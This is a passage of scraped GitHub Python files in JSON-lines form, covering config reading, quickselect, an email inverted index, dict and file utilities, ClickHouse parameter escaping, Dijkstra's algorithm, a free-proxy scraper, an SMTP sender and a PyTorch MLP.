os.path.split(os.path.realpath(__file__))[0]\nconfigPath = os.path.join(proDir, \"config.ini\")\n\nclass ReadConfig:\n    def __init__(self):\n        self.cf = configparser.ConfigParser()\n        self.cf.read(configPath)\n\n    def get_http(self, param):\n        value = self.cf.get(\"http\", param)\n        return value\n\n    def get_db(self, param):\n        value = self.cf.get(\"database\", param)\n        return value\n\nif __name__ == '__main__':\n    test = ReadConfig()\n    # LocalIp = test.get_http('baseurl')\n    LocalIp = test.get_db('ip')\n    print(LocalIp)","repo_name":"jeremyli007/AutoTest","sub_path":"UiTest/readconfig.py","file_name":"readconfig.py","file_ext":"py","file_size_in_byte":612,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"8215705171","text":"import random  # needed for random.randint below\n\ndef quickselect(ar, levy, pravy, K):\n\tif levy == pravy:\n\t\treturn ar[levy]\n\tnahodnyIndex = random.randint(levy, pravy)\n\tpivotIndex = rozdelit(ar, levy, pravy, nahodnyIndex)\n\tif pivotIndex == K:\n\t\treturn ar[pivotIndex]\n\tif pivotIndex < K:\n\t\treturn quickselect(ar, pivotIndex + 1, pravy, K)\n\telse:\n\t\treturn quickselect(ar, levy, pivotIndex - 1, K)\n
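# The fragment above calls rozdelit (a partition routine) that this file does not
# define. A minimal Lomuto-style sketch under that assumption (added annotation; the
# name `hranice` is hypothetical and the original repository may implement it
# differently):
def rozdelit(ar, levy, pravy, pivotIndex):
	pivot = ar[pivotIndex]
	ar[pivotIndex], ar[pravy] = ar[pravy], ar[pivotIndex]  # park the pivot at the end
	hranice = levy  # boundary of the "smaller than pivot" region
	for i in range(levy, pravy):
		if ar[i] < pivot:
			ar[i], ar[hranice] = ar[hranice], ar[i]
			hranice += 1
	ar[hranice], ar[pravy] = ar[pravy], ar[hranice]  # move the pivot into place
	return hranice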
","repo_name":"burtgulash/fav2011-pro","sub_path":"median/fragments/quickselect_recur.py","file_name":"quickselect_recur.py","file_ext":"py","file_size_in_byte":345,"program_lang":"python","lang":"sl","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"31383475430","text":"import email_handling as eh\nimport string\nimport nltk\nfrom nltk.corpus import stopwords\nfrom nltk.stem import PorterStemmer\nimport clean_text as ct\nimport collections\nimport numpy as np\nimport math\nimport pickle\n\n# Store a serialized object in a pickle file\ndef write_pkl(outputfile, item):\n    of = open(outputfile, 'wb')\n    pickle.dump(item, of)\n    of.close()\n    print(\"finish writing in %s !\" % outputfile)\n\n# Convert a list containing tuples into a 2-D list\ndef tuple_to_list(_list): \n    for unit in _list:\n        _list[_list.index(unit)] = list(unit)\n    return _list\n\n# Build an inverted index over email authors; takes a 2-D list of [index, filename] pairs\ndef create_author_InvertedIndex(index_file_list, header):\n    file_set = index_file_list\n    inverted_index = []\n    for i in range(0, len(file_set)):\n        cleaned = eh.extract_header(eh.read_email(file_set[i][1]), header)\n        statistics = collections.Counter(cleaned).most_common() # count word frequencies\n        sub_list = tuple_to_list(statistics)\n        for j in range(0, len(sub_list)): # append the file index after every word\n            sub_list[j].append(file_set[i][0])\n        if len(inverted_index) == 0:\n            inverted_index += sub_list\n        else:\n            combine_list(inverted_index, sub_list)\n    dict_sort = sort_as_dict(inverted_index)\n    return re_comb(dict_sort, len(file_set))\n\n# Build an inverted index over email subjects; takes a 2-D list of [index, filename] pairs\ndef create_subject_InvertedIndex(index_file_list, header):\n    file_set = index_file_list\n    inverted_index = []\n    for i in range(0, len(file_set)):\n        cleaned = get_cleaned_subject(file_set[i][1], header)\n        if len(cleaned) != 0:\n            statistics = collections.Counter(cleaned).most_common() # count word frequencies\n            sub_list = tuple_to_list(statistics)\n            for j in range(0, len(sub_list)): # append the file index after every word\n                sub_list[j].append(file_set[i][0])\n            if len(inverted_index) == 0:\n                inverted_index += sub_list\n            else:\n                combine_list(inverted_index, sub_list)\n    dict_sort = sort_as_dict(inverted_index)\n    return re_comb(dict_sort, len(file_set))\n\n# Build an inverted index over email bodies; takes a 2-D list of [index, filename] pairs\ndef create_body_InvertedIndex(index_file_list):\n    file_set = index_file_list\n    inverted_index = []\n    for i in range(0, len(file_set)):\n        cleaned = get_cleaned_body(file_set[i][1])\n        statistics = collections.Counter(cleaned).most_common() # count word frequencies\n        sub_list = tuple_to_list(statistics)\n        for j in range(0, len(sub_list)): # append the file index after every word\n            sub_list[j].append(file_set[i][0])\n        if len(inverted_index) == 0:\n            inverted_index += sub_list\n        else:\n            combine_list(inverted_index, sub_list)\n    dict_sort = sort_as_dict(inverted_index)\n    return re_comb(dict_sort, len(file_set))\n\n# Takes two 2-D lists\ndef combine_list(list_1, list_2): \n    word_1 = [item[0] for item in list_1]\n    word_2 = [item[0] for item in list_2]\n    for i in range(0, len(word_2)):\n        if word_2[i] in word_1:\n            _index = word_1.index(word_2[i])\n            #list_1[_index][1] += list_2[i][1]\n            list_1[_index].append(list_2[i][1])\n            list_1[_index].append(list_2[i][2])\n        else:\n            w = np.array(list_2[i]).reshape(1, -1).tolist()\n            w[0][1] = int(w[0][1])\n            w[0][2] = int(w[0][2])\n            list_1 += w\n    return list_1\n\n# Takes the finished 2-D list of words plus indices\ndef sort_as_dict(_list): \n    l = [item[0] for item in _list]\n    word = sorted(l)\n    dict = []\n    for i in range(0, len(word)):\n        if word[i] in l:\n            dict.append(_list[l.index(word[i])])\n    return dict\n\ndef get_cleaned_subject(tarpath, header):\n    email = eh.read_email(tarpath)\n    subject = eh.extract_header(email, header)\n    if len(subject) != 0:\n        cleaned = ct.clean_text(subject[0])\n        return cleaned\n    if len(subject) == 0:\n        return []\n\ndef get_cleaned_body(tarpath):\n    email = eh.read_email(tarpath)\n    body = eh.extract_body(email)\n    cleaned = ct.clean_text(body)\n    return cleaned\n\n# tf_td: the number of times term t appears in document d\n# df_t: the number of documents in which t appears\n# Compute the tf-idf weight of each term\n\ndef re_comb(_list, sum_files):\n    word = np.array([item[0] for item in _list]).reshape(-1,1).tolist()\n    tf_td = [[-1 for col in range(1)] for raw in range(len(word))]\n    files = [[-1 for col in range(1)] for raw in range(len(word))]\n    for i in range(0, len(_list)):\n        for j in range(0, int((len(_list[i])-1)/2)):\n            if tf_td[i][0] == -1 or files[i][0] == -1:\n                tf_td[i][0] = _list[i][2*j+1]\n                files[i][0] = _list[i][2*j+2]\n            else:\n                tf_td[i].append(_list[i][2*j+1])\n                files[i].append(_list[i][2*j+2])\n        _sum = sum(tf_td[i])\n        _len = len(files[i])\n        tf_td[i].append(_sum)\n        files[i].append(_len)\n    word_sum = np.array([item.pop() for item in tf_td]).reshape(-1,1).tolist()\n    doc_sum = np.array([item.pop() for item in files]).reshape(-1,1).tolist()\n    N = sum_files\n    for i in range(0, len(tf_td)):\n        word[i].append(doc_sum[i][0])\n        word[i].append(word_sum[i][0])\n        for j in range(0, len(tf_td[i])):\n            tf_td[i][j] = (1 + math.log10(tf_td[i][j])) * math.log10(N / doc_sum[i][0])\n            word[i].append(files[i][j])\n        for j in range(0, len(tf_td[i])):\n            word[i].append(tf_td[i][j])\n    return word
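# Worked example of the weight above (added annotation): with N = 4 documents and a
# term appearing tf = 10 times in a document, where the term occurs in df = 2 of the
# documents, the weight is (1 + log10(10)) * log10(4/2) = 2 * 0.30103 ~= 0.602.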
\n\n'''\nFor each row of the inverted-index 2-D list, the fields mean, in order:\nthe word -- the number of documents containing the word -- the total number of times the word occurs across all documents -- |document indices| -- |tf-idf weights|\n'''\n\n","repo_name":"InftyMing/IR-Vector-Space-Model","sub_path":"code/create_InvertedIndex.py","file_name":"create_InvertedIndex.py","file_ext":"py","file_size_in_byte":5818,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"53"} +{"seq_id":"2366278609","text":"# coding: utf-8\n\nfrom __future__ import unicode_literals, division, print_function\nimport os\nimport shutil\n\n\"\"\"\nThis module defines various classes of supported actions. All actions are\nimplemented as static methods, but are defined using classes (as opposed to\nmodules) so that a set of well-defined actions can be namespaced easily.\n\"\"\"\n\n__author__ = \"Shyue Ping Ong\"\n__copyright__ = \"Copyright 2012, The Materials Project\"\n__version__ = \"0.1\"\n__maintainer__ = \"Shyue Ping Ong\"\n__email__ = \"ongsp@ucsd.edu\"\n__date__ = \"Jun 2, 2012\"\n\n\ndef get_nested_dict(input_dict, key):\n    current = input_dict\n    toks = key.split(\"->\")\n    n = len(toks)\n    for i, tok in enumerate(toks):\n        if tok not in current and i < n - 1:\n            current[tok] = {}\n        elif i == n - 1:\n            return current, toks[-1]\n        current = current[tok]\n\n\nclass DictActions(object):\n    \"\"\"\n    Class to implement the supported mongo-like modifications on a dict.\n    Supported keywords include the following Mongo-based keywords, with the\n    usual meanings (refer to Mongo documentation for information):\n\n    _inc\n    _set\n    _unset\n    _push\n    _push_all\n    _add_to_set (but _each is not supported)\n    _pop\n    _pull\n    _pull_all\n    _rename\n\n    However, note that \"_set\" does not support modification of nested dicts\n    using the mongo {\"a.b\":1} notation. This is because mongo does not allow\n    keys with \".\" to be inserted. Instead, nested dict modification is\n    supported using a special \"->\" keyword, e.g. 
{\"a->b\": 1}\n \"\"\"\n\n @staticmethod\n def set(input_dict, settings):\n for k, v in settings.items():\n (d, key) = get_nested_dict(input_dict, k)\n d[key] = v\n\n @staticmethod\n def unset(input_dict, settings):\n for k in settings.keys():\n (d, key) = get_nested_dict(input_dict, k)\n del d[key]\n\n @staticmethod\n def push(input_dict, settings):\n for k, v in settings.items():\n (d, key) = get_nested_dict(input_dict, k)\n if key in d:\n d[key].append(v)\n else:\n d[key] = [v]\n\n @staticmethod\n def push_all(input_dict, settings):\n for k, v in settings.items():\n (d, key) = get_nested_dict(input_dict, k)\n if key in d:\n d[key].extend(v)\n else:\n d[key] = v\n\n @staticmethod\n def inc(input_dict, settings):\n for k, v in settings.items():\n (d, key) = get_nested_dict(input_dict, k)\n if key in d:\n d[key] += v\n else:\n d[key] = v\n\n @staticmethod\n def rename(input_dict, settings):\n for k, v in settings.items():\n if k in input_dict:\n input_dict[v] = input_dict[k]\n del input_dict[k]\n\n @staticmethod\n def add_to_set(input_dict, settings):\n for k, v in settings.items():\n (d, key) = get_nested_dict(input_dict, k)\n if key in d and (not isinstance(d[key], list)):\n raise ValueError(\"Keyword {} does not refer to an array.\"\n .format(k))\n if key in d and v not in d[key]:\n d[key].append(v)\n elif key not in d:\n d[key] = v\n\n @staticmethod\n def pull(input_dict, settings):\n for k, v in settings.items():\n (d, key) = get_nested_dict(input_dict, k)\n if key in d and (not isinstance(d[key], list)):\n raise ValueError(\"Keyword {} does not refer to an array.\"\n .format(k))\n if key in d:\n d[key] = [i for i in d[key] if i != v]\n\n @staticmethod\n def pull_all(input_dict, settings):\n for k, v in settings.items():\n if k in input_dict and (not isinstance(input_dict[k], list)):\n raise ValueError(\"Keyword {} does not refer to an array.\"\n .format(k))\n for i in v:\n DictActions.pull(input_dict, {k: i})\n\n @staticmethod\n def pop(input_dict, settings):\n for k, v in settings.items():\n (d, key) = get_nested_dict(input_dict, k)\n if key in d and (not isinstance(d[key], list)):\n raise ValueError(\"Keyword {} does not refer to an array.\"\n .format(k))\n if v == 1:\n d[key].pop()\n elif v == -1:\n d[key].pop(0)\n\n\nclass FileActions(object):\n \"\"\"\n Class of supported file actions. For FileActions, the modder class takes in\n a filename as a string. The filename should preferably be a full path to\n avoid ambiguity.\n \"\"\"\n\n @staticmethod\n def file_create(filename, settings):\n \"\"\"\n Creates a file.\n\n Args:\n filename (str): Filename.\n settings (dict): Must be {\"content\": actual_content}\n \"\"\"\n if len(settings) != 1:\n raise ValueError(\"Settings must only contain one item with key \"\n \"'content'.\")\n for k, v in settings.items():\n if k == \"content\":\n with open(filename, 'w') as f:\n f.write(v)\n\n @staticmethod\n def file_move(filename, settings):\n \"\"\"\n Moves a file. {'_file_move': {'dest': 'new_file_name'}}\n\n Args:\n filename (str): Filename.\n settings (dict): Must be {\"dest\": path of new file}\n \"\"\"\n if len(settings) != 1:\n raise ValueError(\"Settings must only contain one item with key \"\n \"'dest'.\")\n for k, v in settings.items():\n if k == \"dest\":\n shutil.move(filename, v)\n\n @staticmethod\n def file_delete(filename, settings):\n \"\"\"\n Deletes a file. {'_file_delete': {'mode': \"actual\"}}\n\n Args:\n filename (str): Filename.\n settings (dict): Must be {\"mode\": actual/simulated}. 
Simulated\n mode only prints the action without performing it.\n \"\"\"\n if len(settings) != 1:\n raise ValueError(\"Settings must only contain one item with key \"\n \"'mode'.\")\n for k, v in settings.items():\n if k == \"mode\" and v == \"actual\":\n try:\n os.remove(filename)\n except OSError:\n #Skip file not found error.\n pass\n elif k == \"mode\" and v == \"simulated\":\n print(\"Simulated removal of {}\".format(filename))\n\n @staticmethod\n def file_copy(filename, settings):\n \"\"\"\n Copies a file. {'_file_copy': {'dest': 'new_file_name'}}\n\n Args:\n filename (str): Filename.\n settings (dict): Must be {\"dest\": path of new file}\n \"\"\"\n for k, v in settings.items():\n if k.startswith(\"dest\"):\n shutil.copyfile(filename, v)\n\n @staticmethod\n def file_modify(filename, settings):\n \"\"\"\n Modifies file access\n\n Args:\n filename (str): Filename.\n settings (dict): Can be \"mode\" or \"owners\"\n \"\"\"\n for k, v in settings.items():\n if k == \"mode\":\n os.chmod(filename,v)\n if k == \"owners\":\n os.chown(filename,v)\n","repo_name":"xiaowei-xie/custodian","sub_path":"custodian/ansible/actions.py","file_name":"actions.py","file_ext":"py","file_size_in_byte":7440,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"53"} +{"seq_id":"39510468459","text":"# Methods used for rendering a ClickHouse query, given a template string and a\n# set of parameters.\n#\n# This uses the `escape_param` function from the `clickhouse-driver` package,\n# but passes an empty `Context` object to it. Prior to\n# https://github.com/mymarilyn/clickhouse-driver/commit/87090902f0270ed51a0b6754d5cbf0dc8544ec4b\n# the `escape_param` function didn't take a `Context` object. As of\n# `clickhouse-driver` 0.2.4 all it uses the context for is to determine the\n# \"server\" timezone, so passing an empty context maintains the existing\n# behaviour of `clickhouse-driver` 0.2.1, the version we were previously using.\n#\n# This is of course a bit of a hack but we want to be able to render queries\n# without the need of having a connection, which seems like a reasonable thing\n# to be able to do. Having a dependency on a connection to render a query is a\n# little over the top.\n#\n# NOTE: this change is necessary because the `clickhouse-driver` package up to\n# 0.2.3 uses an invalid `python_requires` in it's `setup.py` at least for\n# recent versions of setuptools. This was highlighted as a consequence of\n# upgrading to Python 3.10. See\n# https://github.com/mymarilyn/clickhouse-driver/pull/291 for further context.\n\n\nfrom typing import Any\n\nfrom clickhouse_driver.connection import ServerInfo\nfrom clickhouse_driver.context import Context\nfrom clickhouse_driver.util.escape import escape_param\n\n\ndef substitute_params(query, params):\n \"\"\"\n This is a copy of clickhouse-driver's `substitute_params` function without\n the dependency that you need to connect to the server before you can escape\n params. There was a bug in which we were trying to substitute params before\n the connection was established, which caused the query to fail. 
Presumably\n    this was on initial worker startup only.\n\n    It seems somewhat unusual that you need to connect to the server before\n    you can escape params, so we're just going to copy the function here\n    and remove that dependency.\n\n    See\n    https://github.com/mymarilyn/clickhouse-driver/blob/87090902f0270ed51a0b6754d5cbf0dc8544ec4b/clickhouse_driver/client.py#L593\n    for the original function.\n    \"\"\"\n    if not isinstance(params, dict):\n        raise ValueError(\"Parameters are expected in dict form\")\n\n    escaped = escape_params(params)\n    return query % escaped\n\n\ndef escape_params(params):\n    \"\"\"\n    This is a copy of clickhouse-driver's `escape_params` function without the\n    dependency that you need to connect to the server before you can escape\n    params.\n\n    See\n    https://github.com/mymarilyn/clickhouse-driver/blob/87090902f0270ed51a0b6754d5cbf0dc8544ec4b/clickhouse_driver/util/escape.py#L60\n    for the original function.\n    \"\"\"\n    escaped = {}\n\n    for key, value in params.items():\n        escaped[key] = escape_param_for_clickhouse(value)\n\n    return escaped\n\n\ndef escape_param_for_clickhouse(param: Any) -> str:\n    \"\"\"\n    This is a wrapper around the `escape_param` function from the\n    `clickhouse-driver` package, but passes a placeholder `Context` object to it\n    just such that it can run. The only value that the real `escape_param` uses\n    from the context is the server timezone. We assume that the server timezone\n    is UTC.\n\n    See\n    https://github.com/mymarilyn/clickhouse-driver/blob/87090902f0270ed51a0b6754d5cbf0dc8544ec4b/clickhouse_driver/util/escape.py#L31\n    for the wrapped function.\n    \"\"\"\n    context = Context()\n    context.server_info = ServerInfo(\n        name=\"placeholder server_info value\",\n        version_major=\"placeholder server_info value\",\n        version_minor=\"placeholder server_info value\",\n        version_patch=\"placeholder server_info value\",\n        revision=\"placeholder server_info value\",\n        display_name=\"placeholder server_info value\",\n        timezone=\"UTC\",\n    )\n    return escape_param(param, context=context)\n
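# A hypothetical usage sketch (added annotation, not part of the scraped module above;
# the query text and params are illustrative, and the exact quoting is what
# clickhouse-driver's escape_param is expected to produce):
# query = "SELECT count() FROM events WHERE team_id = %(team_id)s AND ts > %(since)s"
# substitute_params(query, {"team_id": 2, "since": "2021-01-01"})
# # -> "SELECT count() FROM events WHERE team_id = 2 AND ts > '2021-01-01'"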
","repo_name":"PostHog/posthog","sub_path":"posthog/clickhouse/client/escape.py","file_name":"escape.py","file_ext":"py","file_size_in_byte":3881,"program_lang":"python","lang":"en","doc_type":"code","stars":14422,"dataset":"github-code","pt":"53"} +{"seq_id":"36363028644","text":"\"\"\"\nAccording to a certain Eastern culture, the lucky numbers are 3, 7, 8 and 9. The unlucky numbers are\nthe rest: 0, 1, 2, 4, 5 and 6.\n\nA number is fortunate if it contains more lucky digits than unlucky digits.\n\nWrite a program that says whether a number entered by the user is fortunate or not.\n\nExample 1:\tEnter a number: 772\n772 is a fortunate number.\n\nExample 2:\tEnter a number: 7720\n7720 is not a fortunate number.\n\nExample 3:\tEnter a number: 43081\n43081 is not a fortunate number.\n\nExample 4:\tEnter a number: 888\n888 is a fortunate number.\n\nExample 5:\tEnter a number: 1234\n1234 is not a fortunate number.\n\nExample 6:\tEnter a number: 6789\n6789 is a fortunate number.\n\"\"\"\nimport sys\n\nprint(\"Fortunate number test\")\nprint(\"-------------------------\")\n\nLUCKY_NUMBERS = \"3789\"\n\nnumber = input(\"Enter a number: \")\nif not number.isdigit():\n    print(\"ERROR. You did not enter a number.\", file=sys.stderr)\n\n# Count the number of lucky digits\nnum_lucky_numbers = 0\nfor digit in number:\n    if digit in LUCKY_NUMBERS:\n        num_lucky_numbers += 1\n\n# If the count of lucky digits is greater than half the total number of digits, the number is fortunate\nif num_lucky_numbers > len(number) // 2:\n    print(f\"{number} is a fortunate number.\")\nelse:\n    print(f\"{number} is not a fortunate number.\")","repo_name":"rdelcastillo/DAW-Python","sub_path":"examenes/curso2223trim1-1/ejercicio4.py","file_name":"ejercicio4.py","file_ext":"py","file_size_in_byte":1469,"program_lang":"python","lang":"es","doc_type":"code","stars":10,"dataset":"github-code","pt":"53"} +{"seq_id":"20059412087","text":"# -----------------------------------------------------------\n#Example of dijkstra algorithm implementation\n#(C) 2021 Paweł Goj, PL\n# Released under MIT license\n# -----------------------------------------------------------\n\n\nfrom collections import deque #list-like container with fast appends and pops on either end\nimport json\n\n#load a file with the graph\nwith open('Weighted_graph.json', 'r') as file:\n    file = file.read()\n\ngraph = json.loads(file)\n\n\n#function creates tuple of dictionary with costs and parents \ndef create_costs_and_parents(graph: dict, start_node: str) -> tuple:\n    infinity = float(\"inf\")\n    costs = {}\n    parents = {}\n    check_list = []\n    try:\n        children = graph[start_node]\n        check_list.append(start_node)\n    except:\n        return {}, {}\n\n    if not children:\n        return {}, {}\n\n    else:\n        queue = deque([])\n        for key, value in children.items():\n            costs.update({key: value})\n            parents.update({key: start_node})\n            queue += key\n            check_list += key\n        \n        while queue != deque([]):\n            node = queue.popleft()\n            children = graph[node]\n            if children != {}:\n                for key in children.keys():\n                    if not key in check_list:\n                        costs.update({key: infinity})\n                        parents.update({key: None})\n                        queue += key\n    return costs, parents\n\n\ndef update_costs_list_dijkstra_algorithm(graph: dict, costs: dict) -> tuple:\n    processed = []\n    node = find_lowest_cost_node(costs, processed)\n    while node is not None:\n        cost = costs[node]\n        neighbors = graph[node]\n        for key in neighbors.keys():\n            new_cost = cost + neighbors[key]\n            if costs[key] > new_cost: \n                costs[key] = new_cost\n                parents[key] = node\n        \n        processed.append(node)\n        node = find_lowest_cost_node(costs, processed)\n    return costs, parents\n\n\ndef find_lowest_cost_node(costs: dict, processed: list):\n    lowest_cost = float(\"inf\")\n    lowest_cost_node = None\n    for key, value in costs.items():\n        if value < lowest_cost and not key in processed:\n            lowest_cost = value \n            lowest_cost_node = key\n    return lowest_cost_node\n\n\n#call a function that creates initial tables \ncosts, parents = create_costs_and_parents(graph, 'A')\n\n\n#print tables before using the dijkstra algorithm \nprint('Initial Tables')\nprint('Parents {node: parent}: ', parents)\nprint('Costs:', costs, '\\n')\n\n\n#call the function that implements the dijkstra algorithm \nlowest_costs, parents = update_costs_list_dijkstra_algorithm(graph, costs)\n\n\n#Find the shortest way from A node to G node \nnode = 'G'\nway = ['G']\nwhile node != 'A':\n    node = parents[node]\n    way.append(node)\n\nway = way[::-1]\n\n\n#print tables after using the dijkstra algorithm \nprint('End Tables')\nprint('Way:', way)\nprint('Lowest costs:', lowest_costs)\nprint('Parents {node: parent}: ', parents)
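# Note (added annotation): find_lowest_cost_node re-scans every node on each step, so
# the update loop above is O(V^2). A common alternative keeps a heap of (cost, node)
# pairs; a minimal sketch assuming the same dict-of-dicts graph shape used here:
import heapq

def dijkstra_heap(graph, start):
    costs = {start: 0}
    heap = [(0, start)]
    while heap:
        cost, node = heapq.heappop(heap)
        if cost > costs.get(node, float('inf')):
            continue  # stale entry left behind by an earlier cost decrease
        for child, weight in graph[node].items():
            new_cost = cost + weight
            if new_cost < costs.get(child, float('inf')):
                costs[child] = new_cost
                heapq.heappush(heap, (new_cost, child))
    return costs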
\n\n\n\n\n\n","repo_name":"pawelgoj/Examples-of-some-algorithms","sub_path":"Graphs_algorithms/dijkstra_algorithm.py","file_name":"dijkstra_algorithm.py","file_ext":"py","file_size_in_byte":3010,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"20419064981","text":"from sqlalchemy.engine import create_engine\r\nfrom sqlalchemy.orm import sessionmaker\r\nfrom sqlalchemy.ext.declarative import declarative_base\r\n\r\n__all__ = (\r\n    \"define_session_sqlite\",\r\n)\r\n\r\nsqlite_engine = create_engine(\r\n    'sqlite:///db/data/wn.db', connect_args={\"check_same_thread\": False}, echo=False)\r\ndefine_session_sqlite = sessionmaker(bind=sqlite_engine)\r\nSQLiteBase = declarative_base(bind=sqlite_engine)\r\n","repo_name":"lookthisline/selenium","sub_path":"db/engine.py","file_name":"engine.py","file_ext":"py","file_size_in_byte":421,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"16410427017","text":"\"\"\"\nThis module parses a proxy-list site, picks the entries that match the requested scheme, and returns one of them\n\"\"\"\n\nimport requests\nfrom bs4 import BeautifulSoup\nfrom random import choice\n\n\nPROXY_URL = 'https://free-proxy-list.net'\n# Use a proxy to search for proxies? Works very slowly when True\nPROXY_FOR_PROXY = None\n# Which scheme is needed? ['yes'] = 'HTTPS' , ['no'] = 'HTTP' , ['yes','no'] = HTTP+HTTPS\nNEED = ['yes']\n# TIMEOUT for checking the ip\nTIME_OUT_CHECK = 30\n# TIMEOUT for searching for proxies\nTIME_OUT_SEARCH = 15\n\n# Sites used to determine the ip (whether it changed or not)\nIP_HTTP_URL = 'http://httpbin.org/ip'\nIP_HTTPS_URL = 'https://2ip.ua/ru/'\n\n\ndef get_HTML (url, proxy=None) :\n    rspns = requests.get (url, proxies = proxy, timeout = TIME_OUT_SEARCH)\n    if rspns.status_code != 200 :\n        print ('ERROR {} . 
I CANT CONNECT TO THE PROXY LIST'.format(rspns.status_code))\n        exit(1)\n    return rspns.text\n\n\ndef get_proxies_list (html, MAX=50) :\n    soup = BeautifulSoup (html, 'lxml')\n    table_body = soup.find('table',id='proxylisttable').find('tbody')\n    trs = table_body.find_all('tr', recursive=False)\n    lenght = len (trs)\n    iCkeck = 0\n    PROXY_LIST = []\n    while (iCkeck < lenght) and len(PROXY_LIST) < MAX :\n        tds = trs[iCkeck].find_all('td')\n        if tds[6].text in NEED :\n            DATA = dict()\n            DATA['https' if tds[6].text == 'yes' else 'http'] = '{0}:{1}'.format(tds[0].text,tds[1].text)\n            PROXY_LIST.append(DATA)\n        iCkeck += 1\n    return PROXY_LIST\n\n\ndef get_new_proxy (MAX=30) :\n    # Returns a proxy server address\n    global PROXY_FOR_PROXY\n    hyper_text = get_HTML (PROXY_URL, PROXY_FOR_PROXY)\n    P_LIST = get_proxies_list (hyper_text, MAX)\n    if not P_LIST :\n        print ('FAILED TO FIND A PROXY')\n        exit(1)\n    proxy = choice (P_LIST)\n    P_LIST.remove(proxy)\n    #PROXY_FOR_PROXY = choice ( P_LIST ) TROUBLES\n    return proxy\n\n\ndef ip_HTTP (proxy) :\n    # Check the ip over an http connection\n    r = requests.get(IP_HTTP_URL, proxies = proxy, timeout = TIME_OUT_CHECK)\n    print ('connected ', end = '')\n    IP = r.json()['origin']\n    try :\n        return IP.split(',')[0]\n    except:\n        return IP\n\n\ndef ip_HTTPS (proxy) :\n    # Check the ip over an https connection\n    r = requests.get(IP_HTTPS_URL, proxies = proxy, timeout= TIME_OUT_CHECK)\n    print ('connected ', end = '')\n    soup = BeautifulSoup (r.text,'lxml')\n    span = soup.find('span', {'class': \"copy-clipboard\", 'data-toggle': \"tooltip\"})\n    IP = span.get('data-clipboard-text')\n    return IP\n\ndef test ( ) :\n    # Function for testing the module\n    global NEED\n    NEED = ['yes']\n    print('\\n\\nHTTPS PROXIES\\n\\n',end = '')\n    for i in range (10) :\n        proxy_s = get_new_proxy (MAX = 25)\n        print (proxy_s)\n        try :\n            print (ip_HTTPS(proxy_s ))\n        except :\n            print (\"PROBLEM DETERMINING THE IP\")\n    NEED = ['no']\n    print('\\n\\nHTTP PROXIES\\n\\n', end = '')\n    for i in range ( 10 ) :\n        proxy = get_new_proxy (MAX = 25)\n        print (proxy)\n        try :\n            print (ip_HTTP ( proxy ))\n        except :\n            print (\"PROBLEM DETERMINING THE IP\")\n\nif __name__ == \"__main__\":\n    test ( )\n","repo_name":"JustTryPy/pynterest","sub_path":"proxy_search.py","file_name":"proxy_search.py","file_ext":"py","file_size_in_byte":3513,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"41182236168","text":"import smtplib\r\nfrom email.mime.text import MIMEText\r\n\r\nbody = \"this is test email how are you :D\"\r\n\r\nmsg = MIMEText(body)\r\nmsg['From'] = \"@.com\"\r\nmsg['To']=\"@.com\"\r\nmsg['Subject']=\"Hello\"\r\n\r\nserver = smtplib.SMTP('smtp..com',)\r\nserver.starttls()\r\nserver.login(\"\", \"\")\r\nserver.send_message(msg)\r\n\r\nprint(\"mail sent\")\r\n\r\nserver.quit()","repo_name":"aydanufuk/Python","sub_path":"networking/emailclient.py","file_name":"emailclient.py","file_ext":"py","file_size_in_byte":333,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"}
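# Note (added annotation): the email script above logs in with empty placeholder
# credentials and an elided SMTP host, which are left as-is. A common safer pattern
# reads secrets from the environment instead of hard-coding them, e.g.:
# import os
# server.login(os.environ["SMTP_USER"], os.environ["SMTP_PASSWORD"])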
 +{"seq_id":"20139488007","text":"\nfrom torch import nn\nimport math\n\n\nclass MLP(nn.Module):\n\n    def __init__(self, n_inpt, n_hiddens, activation=None, activate_final=False, weight_init=True,\n                 mode='truncated_normal'):\n        super(MLP, self).__init__()\n\n        if activation is None:\n            activation = nn.ReLU()\n\n        self._activation = activation\n\n        self._layers = []\n        for n_hidden in n_hiddens:\n            self._layers.append(nn.Linear(n_inpt, n_hidden))\n            self._layers.append(activation)\n            n_inpt = n_hidden\n\n        if not activate_final:\n            self._layers = self._layers[:-1]\n\n        self.net = nn.Sequential(*self._layers)\n\n        if weight_init:\n            self.weight_init(mode=mode)\n\n    def weight_init(self, mode='xavier'):\n        if mode == 'xavier':\n            print('We are now using xavier')\n            initializer = xavier_init\n        elif mode == 'truncated_normal':\n            print('We are now using truncated normals')\n            initializer = truncated_normal_init\n        else:\n            raise NotImplementedError\n\n        for block in self._modules:\n            if block == '_activation':\n                continue\n            else:\n                for m in self._modules[block]:\n                    initializer(m)\n\n    def forward(self, x):\n        return self.net(x)\n\n\ndef xavier_init(m):\n    if isinstance(m, (nn.Linear, nn.Conv2d)):\n        nn.init.xavier_normal_(m.weight)\n        if m.bias is not None:\n            m.bias.data.fill_(0)\n\n    elif isinstance(m, (nn.BatchNorm1d, nn.BatchNorm2d)):\n        m.weight.data.fill_(1)\n        if m.bias is not None:\n            m.bias.data.fill_(0)\n\n\ndef truncated_normal_init(m):\n    if isinstance(m, (nn.Linear, nn.Conv2d)):\n        truncated_normal(m.weight, mean=0, std=1 / math.sqrt(m.weight.shape[1]))\n        if m.bias is not None:\n            m.bias.data.fill_(0)\n\n    elif isinstance(m, (nn.BatchNorm1d, nn.BatchNorm2d)):\n        m.weight.data.fill_(1)\n        if m.bias is not None:\n            m.bias.data.fill_(0)\n\n\ndef truncated_normal(tensor, mean, std):\n    # https://discuss.pytorch.org/t/implementing-truncated-normal-initializer/4778/15\n    size = tensor.shape\n    tmp = tensor.new_empty(size + (4,)).normal_()\n    valid = (tmp < 2) & (tmp > -2)\n    ind = valid.max(-1, keepdim=True)[1]\n    tensor.data.copy_(tmp.gather(-1, ind).squeeze(-1))\n    tensor.data.mul_(std).add_(mean)\n    return tensor
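# A minimal usage sketch for the MLP above (added annotation; the shapes are
# illustrative, and torch itself would need to be imported for the input tensor):
# import torch
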